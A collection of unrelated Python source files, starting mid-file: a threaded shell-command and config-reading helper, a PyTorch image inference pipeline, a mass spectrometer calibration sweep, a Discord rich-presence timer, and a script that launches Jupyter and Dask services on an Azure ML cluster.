t_err = threading.Thread(target=self.err_handler)
t_out.start()
t_err.start()
self.p.wait()
t_out.join()
t_err.join()
self.p.stdout.close()
self.p.stderr.close()
self.stdout = self.out_buf.getvalue()
self.stderr = self.err_buff.getvalue()
self.returncode = self.p.returncode
def out_handler(self):
for line in iter(self.p.stdout.readline, ''):
if self.show is not None:
sys.stdout.write(self.show + line)
self.out_buf.write(line)
def err_handler(self):
for line in iter(self.p.stderr.readline, ''):
if self.show is not None:
sys.stderr.write(self.show + 'Error: ' + line)
self.err_buff.write(line)
def stdout_column(self, column, start=0):
return extract_column(self.stdout, column, start)
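# Minimal usage sketch for Command (illustrative only): run a shell command, wait
# for completion and inspect the captured output and return code.
def _example_command():
    c = Command('echo hello world')
    # stdout/stderr are fully buffered once the constructor returns.
    return c.returncode, c.stdout_column(0)  # -> (0, ['hello'])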
def command(cmd, raises=False):
""" Use this function if you only want the return code.
You can't retrieve stdout nor stderr and it never raises
"""
ret = call(cmd, shell=True)
if ret and raises:
raise RuntimeError("Error while executing <{}>".format(cmd))
return ret
def command_input(cmd, datain, raises=False):
""" Use this if you want to send data to stdin
"""
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
p.communicate(datain)
if p.returncode and raises:
raise RuntimeError("Error while executing <{}>".format(cmd))
return p.returncode
def find_file(file, path):
""" returns the first file path found, in the specified path(es).
:param file: an absolute file path or a file name.
:param path: None or string or list, used only if file path is not absolute.
if None or empty string, search in current directory.
if '...', search recursively in current directory and its parents up to but not including '/'.
if string, must be an absolute path to search for file.
if list of strings, search in each specified path (can be '.', '..' or '...')
:return: the first file path found
"""
def check_path(file, path):
if path == '...':
path = os.getcwd()
while path != '/':
f = os.path.join(path, file)
if os.path.isfile(f):
return f, True
path = os.path.dirname(path)
return file, False
else:
f = os.path.join(path, file)
return f, os.path.isfile(f)
if os.path.isabs(file):
return file
path = path or os.getcwd()
if isinstance(path, basestring):
file, is_file = check_path(file, path)
if is_file:
return file
raise RuntimeError("File {} not found".format(file))
else:
for p in path:
f, is_file = check_path(file, p)
if is_file:
return f
raise RuntimeError("File {} not found in {}".format(file, path))
def read_configuration(file, path=None):
""" read configuration from file or string
:param file: a file name or an inline configuration string
    :param path: None or string or list of strings.
if '.py' or '.yaml' or '.json', file is interpreted as an inline configuration string,
if string or list of strings, specifies search path(es) for file (current directory if path is None)
:return: a tuple (ConfAttrDict, config file path)
"""
if path in ('.py', '.yaml', '.json'):
data = file
file, ext = 'inline', path
else:
_, ext = os.path.splitext(file)
file = find_file(file, path)
with open(file, 'r') as f:
data = f.read()
if ext == '.py':
conf = ConfAttrDict()
exec(compile(data, file, 'exec'), dict(os.environ), conf)
elif ext in ('.yml', '.yaml'):
import yaml
conf = ConfAttrDict(yaml.load(data))
elif ext == '.json':
try:
import simplejson as json
except ImportError:
import json
conf = ConfAttrDict(json.loads(data))
else:
raise TypeError("Unknown file format %s" % file)
return conf, file
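# Minimal usage sketch for read_configuration (illustrative only): passing the
# extension as `path` parses the first argument as an inline configuration string.
def _example_read_configuration():
    conf, source = read_configuration("host: localhost\nport: 8080", '.yaml')
    return conf.port, source  # -> (8080, 'inline')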
|
inference.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Inference Pipeline.
"""
from __future__ import annotations
import os
import threading
from queue import Queue
from typing import Any
from typing import Optional
from typing import Union
import cv2
import numpy as np
import torch
from torch import Tensor
from torchvision.transforms import functional as F
from onevision.cv import get_image_hw
from onevision.cv import ImageLoader
from onevision.cv import ImageWriter
from onevision.cv import InterpolationMode
from onevision.cv import resize
from onevision.cv import to_image
from onevision.factory import INFERENCES
from onevision.file import create_dirs
from onevision.nn.model.utils import get_next_version
from onevision.type import Arrays
from onevision.type import Int2T
from onevision.type import Int3T
from onevision.utils import console
from onevision.utils import progress_bar
from onevision.utils import select_device
__all__ = [
"Inference"
]
# MARK: - Inference
# noinspection PyMethodMayBeStatic
@INFERENCES.register(name="inferences")
class Inference:
"""Inference class defines the prediction loop for image data: images,
folders, video, etc.
Attributes:
default_root_dir (str):
Root dir to save predicted data.
output_dir (str):
Output directory to save predicted images.
model (nn.Module):
Model to run.
data (str):
Data source. Can be a path or pattern to image/video/directory.
data_loader (Any):
Data loader object.
shape (tuple, optional):
Input and output shape of the image as [H, W, C]. If `None`,
use the input image shape.
batch_size (int):
Batch size. Default: `1`.
device (int, str, optional):
Will be mapped to either gpus, tpu_cores, num_processes or ipus,
based on the accelerator type.
verbose (bool):
Verbosity mode. Default: `False`.
save_image (bool):
Save predicted images. Default: `False`.
"""
# MARK: Magic Functions
def __init__(
self,
default_root_dir: str,
version : Union[int, str, None] = None,
shape : Optional[Int3T] = None,
batch_size : int = 1,
device : Union[int, str, None] = 0,
verbose : bool = True,
save_image : bool = False,
*args, **kwargs
):
super().__init__()
self.default_root_dir = default_root_dir
self.shape = shape
self.batch_size = batch_size
self.device = select_device(device=device)
self.verbose = verbose
self.save_image = save_image
self.model = None
self.data = None
self.data_loader = None
self.image_writer = None
self.init_output_dir(version=version)
# MARK: Configure
def init_output_dir(self, version: Union[int, str, None] = None):
"""Configure output directory base on the given version.
Args:
version (int, str, optional):
Experiment version. If version is not specified the logger
inspects the save directory for existing versions, then
automatically assigns the next available version. If it is a
string then it is used as the run-specific subdirectory name,
otherwise `version_${version}` is used.
"""
if version is None:
version = get_next_version(root_dir=self.default_root_dir)
if isinstance(version, int):
version = f"version_{version}"
version = version.lower()
self.output_dir = os.path.join(self.default_root_dir, version)
console.log(f"Output directory at: {self.output_dir}.")
def init_data_loader(self):
"""Configure the data loader object."""
self.data_loader = ImageLoader(
data=self.data, batch_size=self.batch_size
)
def init_data_writer(self):
"""Configure the data writer object."""
self.image_writer = ImageWriter(dst=self.output_dir)
def validate_attributes(self):
"""Validate all attributes' values before run loop start."""
if self.model is None:
raise ValueError(f"`model` must be defined.")
if self.data_loader is None:
raise ValueError(f"`data_loader` must be defined.")
if self.save_image and self.image_writer is None:
raise ValueError(f"`image_writer` must be defined.")
# MARK: Run
def run(self, model: Any, data: str):
"""Main prediction loop.
Args:
model (nn.Module):
Model to run.
data (str):
Data source. Can be a path or pattern to image/video/directory.
"""
self.model = model
self.data = data
self.run_routine_start()
        # NOTE: Main loop
with progress_bar() as pbar:
for batch_idx, batch in pbar.track(
enumerate(self.data_loader),
total=len(self.data_loader),
description=f"[bright_yellow]{self.model.fullname}"
):
images, indexes, files, rel_paths = batch
input, size0, size1 = self.preprocess(images)
pred = self.model.forward(input)
results = self.postprocess(pred, size0, size1)
if self.verbose:
self.show_results(results=results)
if self.save_image:
self.image_writer.write_images(
images=results, image_files=rel_paths
)
self.run_routine_end()
def run_routine_start(self):
"""When run routine starts we build the `output_dir` on the fly."""
create_dirs(paths=[self.output_dir])
self.init_data_loader()
self.init_data_writer()
self.validate_attributes()
self.model.to(self.device)
self.model.eval()
if self.verbose:
cv2.namedWindow(
"results", cv2.WINDOW_AUTOSIZE | cv2.WINDOW_KEEPRATIO
)
def preprocess(self, images: Arrays) -> tuple[Tensor, Int2T, Int2T]:
"""Preprocessing input.
Args:
images (Arrays):
Input images as [B, H, W, C].
Returns:
x (Tensor):
                Input image as [B, C, H, W].
size0 (Int2T):
The original images' sizes.
size1 (Int2T):
The resized images' sizes.
"""
# NOTE: THIS PIPELINE IS FASTER
size0 = get_image_hw(images)
if self.shape:
images = [resize(i, self.shape) for i in images]
images = [F.to_tensor(i) for i in images]
images = torch.stack(images)
size1 = get_image_hw(images)
images = images.to(self.device)
"""
# NOTE: THIS PIPELINE IS SLOWER
size0 = get_image_size(images)
images = [torchvision.transforms.ToTensor()(i) for i in images]
images = torch.stack(images)
images = images.to(self.device)
if self.shape:
images = resize(images, self.shape)
# images = [resize(i, self.shape) for i in images]
size1 = get_image_size(images)
"""
return images, size0, size1
def postprocess(
self, results: Tensor, size0: Int2T, size1: Int2T
) -> np.ndarray:
"""Postprocessing results.
Args:
results (Tensor):
Output images.
size0 (Int2T):
The original images' sizes.
size1 (Int2T):
The resized images' sizes.
Returns:
results (np.ndarray):
Post-processed output images as [B, H, W, C].
"""
        # For multi-stage models, we only get the last pred
if isinstance(results, (list, tuple)):
results = results[-1]
results = to_image(results, denormalize=True) # List of 4D-array
if size0 != size1:
results = resize(
results, size0, interpolation=InterpolationMode.CUBIC
)
return results
def run_routine_end(self):
"""When run routine ends we release data loader and writers."""
self.model.train()
if self.verbose:
cv2.destroyAllWindows()
# MARK: Visualize
def show_results(self, results: np.ndarray):
"""Show results.
Args:
results (np.ndarray):
Post-processed output images as [B, H, W, C].
"""
for i in results:
cv2.imshow("results", i)
cv2.waitKey(1)
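# Minimal usage sketch for Inference (illustrative only). The model passed in is
# assumed to expose `forward`, `fullname`, `to`, `eval` and `train` as used by the
# loop above; the directory and data pattern below are hypothetical.
def _example_run_inference(model, data="data/images/*.jpg"):
    infer = Inference(
        default_root_dir="runs/infer",  # hypothetical output root
        shape=(256, 256, 3),
        batch_size=1,
        device=0,
        verbose=False,
        save_image=True,
    )
    # Predictions are written under runs/infer/version_<n>/.
    infer.run(model=model, data=data)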
# MARK: - MultiThreadInference
@INFERENCES.register(name="multithread_inference")
class MultiThreadInference(Inference):
"""Multi-Thread Inference class defines the prediction loop for image data:
images, folders, video, etc.
Attributes:
default_root_dir (str):
Root dir to save predicted data.
output_dir (str):
Output directory to save predicted images.
model (nn.Module):
Model to run.
data (str):
Data source. Can be a path or pattern to image/video/directory.
data_loader (Any):
Data loader object.
shape (tuple, optional):
Input and output shape of the image as [H, W, C]. If `None`,
use the input image shape.
batch_size (int):
Batch size. Default: `1`.
device (int, str, optional):
Will be mapped to either gpus, tpu_cores, num_processes or ipus,
based on the accelerator type.
        queue_size (int):
            Maximum number of items held in each inter-thread queue. Default: `10`.
verbose (bool):
Verbosity mode. Default: `False`.
save_image (bool):
Save predicted images. Default: `False`.
"""
# MARK: Magic Functions
def __init__(
self,
default_root_dir: str,
version : Union[int, str, None] = None,
shape : Optional[Int3T] = None,
batch_size : int = 1,
device : Union[int, str, None] = 0,
queue_size : int = 10,
verbose : bool = True,
save_image : bool = False,
*args, **kwargs
):
super().__init__(
default_root_dir = default_root_dir,
version = version,
shape = shape,
batch_size = batch_size,
device = device,
queue_size = queue_size,
verbose = verbose,
save_image = save_image,
*args, **kwargs
)
self.pbar = None
self.task = None
self.queue_size = queue_size
# NOTE: Queue
self.frames_queue = Queue(maxsize=self.queue_size)
self.input_queue = Queue(maxsize=self.queue_size)
self.pred_queue = Queue(maxsize=self.queue_size)
self.results_queue = Queue(maxsize=self.queue_size)
# MARK: Run
def run(self, model: Any, data: str):
"""Main prediction loop.
Args:
model (nn.Module):
Model to run.
data (str):
Data source. Can be a path or pattern to image/video/directory.
"""
self.model = model
self.data = data
self.run_routine_start()
# NOTE: Thread for data reader
thread_data_reader = threading.Thread(target=self.run_data_reader)
thread_data_reader.start()
# NOTE: Thread for pre-process
thread_preprocess = threading.Thread(target=self.run_preprocess)
thread_preprocess.start()
# NOTE: Thread for model
thread_model = threading.Thread(target=self.run_model)
thread_model.start()
# NOTE: Thread for post-process
thread_postprocess = threading.Thread(target=self.run_postprocess)
thread_postprocess.start()
# NOTE: Thread for result writer
thread_result_writer = threading.Thread(target=self.run_result_writer)
thread_result_writer.start()
# NOTE: Joins threads when all terminate
thread_data_reader.join()
thread_preprocess.join()
thread_model.join()
thread_postprocess.join()
thread_result_writer.join()
self.run_routine_end()
def run_routine_start(self):
"""When run routine starts we build the `output_dir` on the fly."""
create_dirs(paths=[self.output_dir])
self.init_data_loader()
self.init_data_writer()
self.validate_attributes()
self.model.to(self.device)
self.model.eval()
self.pbar = progress_bar()
with self.pbar:
self.task = self.pbar.add_task("Inferring", total=len(self.data_loader))
if self.verbose:
cv2.namedWindow(
"results", cv2.WINDOW_AUTOSIZE | cv2.WINDOW_KEEPRATIO
)
def run_data_reader(self):
"""Run data reader thread and push images and frame_indexes to queue.
"""
for images, indexes, files, rel_paths in self.data_loader:
if len(indexes) > 0:
# NOTE: Push frame index and images to queue
self.frames_queue.put([images, indexes, files, rel_paths])
# NOTE: Push None to queue to act as a stopping condition for next
# thread
self.frames_queue.put([None, None, None, None])
def run_preprocess(self):
"""Run pre-processing thread and push input to queue."""
while True:
# NOTE: Get frame indexes and images from queue
(images, indexes, files, rel_paths) = self.frames_queue.get()
if indexes is None:
break
# NOTE: Pre-processing images
images, size0, size1 = self.preprocess(images)
# NOTE: Push input to queue
self.input_queue.put([images, indexes, files, rel_paths, size0, size1])
# NOTE: Push None to queue to act as a stopping condition for next
# thread
self.input_queue.put([None, None, None, None, None, None])
def run_model(self):
"""Run model thread and push pred to queue."""
while True:
# NOTE: Get input from queue
(input, indexes, files, rel_paths, size0, size1) = self.input_queue.get()
if indexes is None:
break
# NOTE: Detect batch of inputs
preds = self.model.forward(input)
# NOTE: Push predictions to queue
self.pred_queue.put([preds, indexes, files, rel_paths, size0, size1])
# NOTE: Push None to queue to act as a stopping condition for next
# thread
self.pred_queue.put([None, None, None, None, None, None])
def run_postprocess(self):
"""Run post-processing thread and push results to queue."""
while True:
# NOTE: Get predictions from queue
(preds, indexes, files, rel_paths, size0, size1) = self.pred_queue.get()
if indexes is None:
break
# NOTE: Post-processing images
results = self.postprocess(preds, size0, size1)
# NOTE: Push results to queue
self.results_queue.put([results, indexes, files, rel_paths])
with self.pbar:
self.pbar.update(self.task, advance=1)
# NOTE: Push None to queue to act as a stopping condition for next
# thread
self.results_queue.put([None, None, None, None])
def run_result_writer(self):
"""Run result writing thread."""
while True:
# NOTE: Get predictions from queue
(results, indexes, files, rel_paths) = self.results_queue.get()
if indexes is None:
break
if self.verbose:
self.show_results(results=results)
if self.save_image:
self.image_writer.write_images(
images=results, image_files=rel_paths
)
def run_routine_end(self):
"""When run routine ends we release data loader and writers."""
self.model.train()
if self.verbose:
cv2.destroyAllWindows()
# MARK: Visualize
def show_results(self, results: np.ndarray):
"""Show results.
Args:
results (np.ndarray):
Post-processed output images as [B, H, W, C].
"""
for i in results:
cv2.imshow("results", i)
cv2.waitKey(1)
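# The threads above hand work along a chain of bounded queues and signal completion
# by pushing a `None` sentinel, so each downstream stage can leave its loop. Below
# is a minimal, self-contained sketch of that pattern (illustrative only, not part
# of the pipeline above).
def _example_sentinel_queue_pipeline(items=(1, 2, 3)):
    q, results = Queue(maxsize=2), []

    def producer():
        for item in items:
            q.put(item)
        q.put(None)  # sentinel: no more work for the consumer

    def consumer():
        while True:
            item = q.get()
            if item is None:
                break
            results.append(item * 10)

    workers = [threading.Thread(target=producer), threading.Thread(target=consumer)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return results  # -> [10, 20, 30]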
|
mass_calibrator.py
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from traits.api import (
HasTraits,
Float,
Int,
List,
Str,
Any,
Event,
Property,
on_trait_change,
Range,
)
from traitsui.api import (
View,
Item,
HGroup,
spring,
EnumEditor,
ButtonEditor,
Group,
TextEditor,
)
# ============= standard library imports ========================
from numpy import array, hstack, Inf, savetxt
import csv
import os
from threading import Thread
import struct
# ============= local library imports ==========================
from pychron.core.helpers.filetools import unique_path
from pychron.core.helpers.isotope_utils import sort_isotopes
from pychron.paths import paths
from pychron.spectrometer.jobs.magnet_sweep import MagnetSweep
from pychron.core.stats.peak_detection import (
find_peaks,
calculate_peak_center,
PeakCenterError,
)
from pychron.core.ui.gui import invoke_in_main_thread
import six
from six.moves import zip
DELTA_TOOLTIP = """The minimum difference between a peak and
the following points, before a peak may be considered a peak"""
class CalibrationPeak(HasTraits):
isotope = Str("Ar40")
dac = Float
isotopes = List
ruler = Any
class MassCalibratorSweep(MagnetSweep):
db = Any
start_dac = Float(4)
stop_dac = Float(8.0)
step_dac = Float(0.1)
period = 10
calibration_peaks = List
selected = Any
# peak detection tuning parameters
min_peak_height = Float(1)
min_peak_separation = Range(0.0001, 1000)
    # if the next point is less than delta from the current point, then this is not a peak;
    # essentially, how much the peak must stand out from the background
delta = Float(1)
fperiod = Int(50)
fwindow = Float(1)
fstep_dac = Float(0.1)
fexecute_button = Event
fexecute_label = Property(depends_on="_alive")
fine_scan_enabled = Property(depends_on="calibration_peaks:isotope")
_fine_scanning = False
def setup_graph(self):
g = self.graph
g.new_plot()
g.set_x_title("DAC")
g.new_series()
mi = min(self.start_dac, self.stop_dac)
ma = max(self.start_dac, self.stop_dac)
g.set_x_limits(min_=mi, max_=ma, pad="0.1")
def _fine_scan(self):
operiod = self.period
self.period = self.fperiod
self._fine_scanning = True
i = 1
self.graph.new_plot(padding_top=10, xtitle="Relative DAC")
w = self.fwindow / 2.0
self.graph.set_x_limits(min_=-w, max_=w, plotid=1)
self._redraw()
for cp in self.calibration_peaks:
if not cp.isotope:
continue
if self.isAlive():
self.selected = cp
self.info(
"Fine scan calibration peak {}. {} dac={}".format(
i, cp.isotope, cp.dac
)
)
self._fine_scan_peak(cp)
i += 1
self.period = operiod
self._fine_scanning = False
if self.isAlive():
if self.confirmation_dialog("Save to Database"):
self._save_to_db()
if self.confirmation_dialog("Apply Calibration"):
self._apply_calibration()
def _pack(self, d):
data = "".join([struct.pack(">ff", x, y) for x, y in d])
return data
def _save_to_db(self):
db = self.db
spectrometer = "Obama"
hist = db.add_mass_calibration_history(spectrometer)
# add coarse scan
d = self._get_coarse_data()
data = self._pack(d)
db.add_mass_calibration_scan(hist, blob=data)
# add fine scans
plot = self.graph.plots[1]
cps = [cp for cp in self.calibration_peaks if cp.isotope]
for cp, ki in zip(cps, sorted(plot.plots.keys())):
p = plot.plots[ki][0]
xs = p.index.get_data()
ys = p.value.get_data()
d = array((xs, ys)).T
data = self._pack(d)
db.add_mass_calibration_scan(
hist,
cp.isotope,
blob=data,
center=cp.dac,
)
db.commit()
def _apply_calibration(self):
"""
save calibration peaks as mag field table
"""
p = os.path.join(paths.spectrometer_dir, "mftable.csv")
with open(p, "w") as wfile:
writer = csv.writer(wfile, delimiter=",")
for cp in self.calibration_peaks:
if cp.isotope:
writer.writerow([cp.isotope, cp.dac])
def _fine_scan_peak(self, cp):
line, _ = self.graph.new_series(plotid=1)
c = cp.dac
w = self.fwindow / 2.0
steps = self._calc_step_values(c - w, c + w, self.fstep_dac)
self._scan_dac(steps)
# get last scan
xs = line.index.get_data()
ys = line.value.get_data()
try:
center = calculate_peak_center(xs, ys)
# if not isinstance(center, str):
[lx, cx, hx], [ly, cy, hy], mx, my = center
self.graph.add_vertical_rule(cx, plotid=1)
self.info(
"new peak center. {} nominal={} dx={}".format(cp.isotope, cp.dac, cx)
)
cp.dac += cx
self._redraw()
except PeakCenterError as e:
self.warning(e)
# else:
# self.warning(center)
def _update_graph_data(self, *args, **kw):
"""
add and scale scans
"""
if self._fine_scanning:
self._update_fine_graph_data(*args, **kw)
else:
super(MassCalibratorSweep, self)._update_graph_data(*args, **kw)
def _update_fine_graph_data(self, plot, di, intensities, **kw):
# print di, intensities
# convert dac to a relative dac
di -= self.selected.dac
ks = sorted(plot.plots.keys())
cur = plot.plots[ks[-1]][0]
if hasattr(cur, "odata"):
oys = getattr(cur, "odata")
oys = hstack((oys, intensities[:1]))
else:
oys = array(intensities)
setattr(cur, "odata", oys)
xs = cur.index.get_data()
xs = hstack((xs, di))
cur.index.set_data(xs)
_R = -Inf
# get the max range and normalize all series
for p in six.itervalues(plot.plots):
p = p[0]
high, low = max(p.odata), min(p.odata)
tR = high - low
if tR > _R:
_R = tR
miR = low
for p in six.itervalues(plot.plots):
p = p[0]
oys = p.odata
high, low = max(p.odata), min(p.odata)
r = high - low
if r:
oys = (oys - low) * _R / r + miR
p.value.set_data(oys)
def _fine_graph_hook(self, *args, **kw):
plot = self.graph.plots[1]
self._update_graph_data(plot, *args, **kw)
def _graph_hook(self, *args, **kw):
if self._fine_scanning:
self._fine_graph_hook(*args, **kw)
else:
super(MassCalibratorSweep, self)._graph_hook(*args, **kw)
def _dump_scan(self):
root = os.path.join(paths.data_dir, "mass_calibration_scans")
if not os.path.isdir(root):
os.mkdir(root)
p, _ = unique_path(root, "scan")
d = self._get_coarse_data()
savetxt(p, d)
def _get_coarse_data(self):
"""
return coarse scan as (dac,intensity) pairs
"""
data = self.graph.plots[0].data
xs = data.get_data("x0")
ys = data.get_data("y0")
return array((xs, ys)).T
def _find_peaks(self):
if self.graph.plots:
# clear peaks
self.graph.remove_rulers()
data = self.graph.plots[0].data
xs = data.get_data("x0")
ys = data.get_data("y0")
if len(xs) and len(ys):
lookahead = max(1, int(self.min_peak_separation / self.fstep_dac))
mxp, mip = find_peaks(ys, xs, lookahead=lookahead, delta=self.delta)
pks = []
isos = list(self.spectrometer.molecular_weights.keys())
isos = sort_isotopes(isos)
for dac, v in mxp:
if v > self.min_peak_height:
l = self.graph.add_vertical_rule(dac)
pks.append(CalibrationPeak(dac=dac, isotopes=isos, ruler=l))
self.calibration_peaks = pks
self._redraw()
def _set_x_limits(self):
if self.graph:
mi = min(self.start_dac, self.stop_dac)
ma = max(self.start_dac, self.stop_dac)
self.graph.set_x_limits(min_=mi, max_=ma, pad="0.1")
def _redraw(self):
invoke_in_main_thread(self.graph.redraw)
def _execute(self):
self.spectrometer.magnet.settling_time = 0.001
sm = self.start_dac
em = self.stop_dac
stm = self.step_dac
self.verbose = True
if abs(sm - em) > stm:
# do initial scan
self._do_sweep(sm, em, stm, map_mass=False)
self._alive = False
# write data to file for testing
self._dump_scan()
# find peaks
self._find_peaks()
self._post_execute()
self.verbose = False
def _end(self):
self._fine_scanning = False
# ===================================================================================================================
# handlers
# ===================================================================================================================
@on_trait_change("min_peak_height, min_peak_separation, delta")
def _handle_peak_detection_change(self):
self._find_peaks()
def _fexecute_button_fired(self):
if self.isAlive():
self.stop()
self._end()
else:
self._alive = True
t = Thread(name="fine scan", target=self._fine_scan)
t.start()
def _selected_changed(self):
for p in self.calibration_peaks:
ruler = p.ruler
ruler.line_width = 1
ruler.color = (1.0, 0, 0)
if self.selected:
self.selected.ruler.line_width = 5
self.selected.ruler.color = (0, 1.0, 0)
self.graph.redraw()
def _start_dac_changed(self):
self._set_x_limits()
def _stop_dac_changed(self):
self._set_x_limits()
def traits_view(self):
coarse_grp = Group(
Item("reference_detector", editor=EnumEditor(name="detectors")),
Item("start_dac", label="Start"),
Item("stop_dac", label="Stop"),
Item("step_dac", label="Step"),
Item("period", label="Scan Period (ms)"),
HGroup(
spring,
Item(
"execute_button",
editor=ButtonEditor(label_value="execute_label"),
show_label=False,
),
),
label="Coarse",
)
peak_detection_grp = Group(
Item("min_peak_height", label="Min. Height (fA)"),
Item(
"min_peak_separation",
label="Min. Separation (V)",
editor=TextEditor(evaluate=float),
),
Item("delta", tooltip=DELTA_TOOLTIP),
label="Peak Detection",
)
fine_grp = Group(
Item("fwindow", label="Window (V)", tooltip="+/- volts centered at peak_i"),
Item(
"fperiod",
label="Scan Period (ms)",
tooltip="fine scan integration time",
),
HGroup(
spring,
Item(
"fexecute_button",
editor=ButtonEditor(label_value="fexecute_label"),
show_label=False,
),
),
label="Fine",
enabled_when="fine_scan_enabled",
)
v = View(Group(coarse_grp, peak_detection_grp, fine_grp, layout="tabbed"))
return v
def _get_fine_scan_enabled(self):
return len([cp for cp in self.calibration_peaks if cp.isotope]) > 2
def _get_fexecute_label(self):
return "Stop" if self.isAlive() else "Start"
# ============= EOF =============================================
|
pomo.py
|
import threading
from pypresence import Presence
import time
from tkinter import *
from tkinter.ttk import *
# Creating and connecting presence
rpc = Presence(client_id="857867709618061324")
rpc.connect()
def window():
"""
Tkinter window initialisation
"""
# Create Object
root = Tk()
# Initialize tkinter window with dimensions
root.geometry('600x500')
# Create button
btn = Button(root, text='Click me!',
command=lambda: threading.Thread(target=buttonOne).start())
# Set the position of button on the top of window
btn.pack(side='top')
root.mainloop()
def buttonOne():
"""
Used to call display from thread start
:return: None
"""
display()
return
def display():
"""
Displays rich presence details
"""
while True: # The presence will stay on as long as the program is running
current_time = int(time.time())
minutes = 1
hours_added = current_time + (minutes * 60)
rpc.update(state="fun", details="playing", end=hours_added,
large_image="307485929256211") # Set the presence
time.sleep(minutes * 60) # Sleep for length of end time
break
if __name__ == "__main__":
window()
|
startDask.py
|
# original source code is from "Azure Machine Learning examples" repo.
# url : https://github.com/Azure/azureml-examples/tree/main/cli/jobs/single-step/dask/nyctaxi
import os
import argparse
import time
from dask.distributed import Client, get_task_stream
import sys, uuid
import threading
import subprocess
import socket
import mlflow
from bokeh.io import export_png  # save the dashboard
from notebook.notebookapp import list_running_servers
def flush(proc, proc_log):
while True:
proc_out = proc.stdout.readline()
if proc_out == "" and proc.poll() is not None:
proc_log.close()
break
elif proc_out:
sys.stdout.write(proc_out)
proc_log.write(proc_out)
proc_log.flush()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--jupyter_token", default=uuid.uuid1().hex)
parser.add_argument("--script")
args, unparsed = parser.parse_known_args()
for k, v in os.environ.items():
if k.startswith("MLFLOW"):
print(k, v)
MLFLOW_RUN_ID = os.getenv("MLFLOW_RUN_ID")
    # Save the dashboard
client = Client()
    # Get the information needed to start Dask from the environment variables
print(
"- env: AZ_BATCHAI_JOB_MASTER_NODE_IP: ",
os.environ.get("AZ_BATCHAI_JOB_MASTER_NODE_IP"),
)
print(
"- env: AZ_BATCHAI_IS_CURRENT_NODE_MASTER: ",
os.environ.get("AZ_BATCHAI_IS_CURRENT_NODE_MASTER"),
)
print("- env: AZ_BATCHAI_NODE_IP: ", os.environ.get("AZ_BATCHAI_NODE_IP"))
print("- env: AZ_BATCH_HOST_LIST: ", os.environ.get("AZ_BATCH_HOST_LIST"))
print("- env: AZ_BATCH_NODE_LIST: ", os.environ.get("AZ_BATCH_NODE_LIST"))
print("- env: MASTER_ADDR: ", os.environ.get("MASTER_ADDR"))
print("- env: MASTER_PORT: ", os.environ.get("MASTER_PORT"))
print("- env: RANK: ", os.environ.get("RANK"))
print("- env: LOCAL_RANK: ", os.environ.get("LOCAL_RANK"))
print("- env: NODE_RANK: ", os.environ.get("NODE_RANK"))
print("- env: WORLD_SIZE: ", os.environ.get("WORLD_SIZE"))
rank = os.environ.get("RANK")
ip = socket.gethostbyname(socket.gethostname())
master = os.environ.get("MASTER_ADDR")
master_port = os.environ.get("MASTER_PORT")
print("- my rank is ", rank)
print("- my ip is ", ip)
print("- master is ", master)
print("- master port is ", master_port)
scheduler = master + ":8786"
dashboard = master + ":8787"
print("- scheduler is ", scheduler)
print("- dashboard is ", dashboard)
print("args: ", args)
print("unparsed: ", unparsed)
print("- my rank is ", rank)
print("- my ip is ", ip)
if not os.path.exists("logs"):
os.makedirs("logs")
print("free disk space on /tmp")
os.system(f"df -P /tmp")
mlflow.log_param("WORLD_SIZE", os.environ.get("WORLD_SIZE"))
    # Processing on rank 0
if str(rank) == "0":
mlflow.log_param("headnode", ip)
mlflow.log_param(
"cluster",
"scheduler: {scheduler}, dashboard: {dashboard}".format(
scheduler=scheduler, dashboard=dashboard
),
)
cmd = (
"jupyter lab --ip 0.0.0.0 --port 8888"
+ " --NotebookApp.token={token}"
+ " --allow-root --no-browser"
).format(token=args.jupyter_token)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
jupyter_log = open("logs/jupyter_log.txt", "w")
jupyter_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
jupyter_flush = threading.Thread(target=flush, args=(jupyter_proc, jupyter_log))
jupyter_flush.start()
# while not list(list_running_servers()):
# time.sleep(5)
# jupyter_servers = list(list_running_servers())
# assert (len(jupyter_servers) == 1), "more than one jupyter server is running"
mlflow.log_param(
"jupyter", "ip: {ip_addr}, port: {port}".format(ip_addr=ip, port="8888")
)
mlflow.log_param("jupyter-token", args.jupyter_token)
cmd = (
"dask-scheduler "
+ "--port "
+ scheduler.split(":")[1]
+ " --dashboard-address "
+ dashboard
)
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
scheduler_log = open("logs/scheduler_log.txt", "w")
scheduler_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
scheduler_flush = threading.Thread(
target=flush, args=(scheduler_proc, scheduler_log)
)
scheduler_flush.start()
cmd = "dask-worker " + scheduler
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
worker_log = open("logs/worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
worker_flush = threading.Thread(target=flush, args=(worker_proc, worker_log))
worker_flush.start()
print("### OUTPUT STREAM ###")
with get_task_stream(client, plot='save', filename='task_stream.html') as ts:
futs = client.map(lambda x: time.sleep(x**2), range(5))
results = client.gather(futs)
if args.script:
command_line = " ".join(["python", args.script] + unparsed)
print("Launching:", command_line)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
driver_log = open("logs/driver_log.txt", "w")
driver_proc = subprocess.Popen(
command_line.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
driver_flush = threading.Thread(
target=flush, args=(driver_proc, driver_log)
)
driver_flush.start()
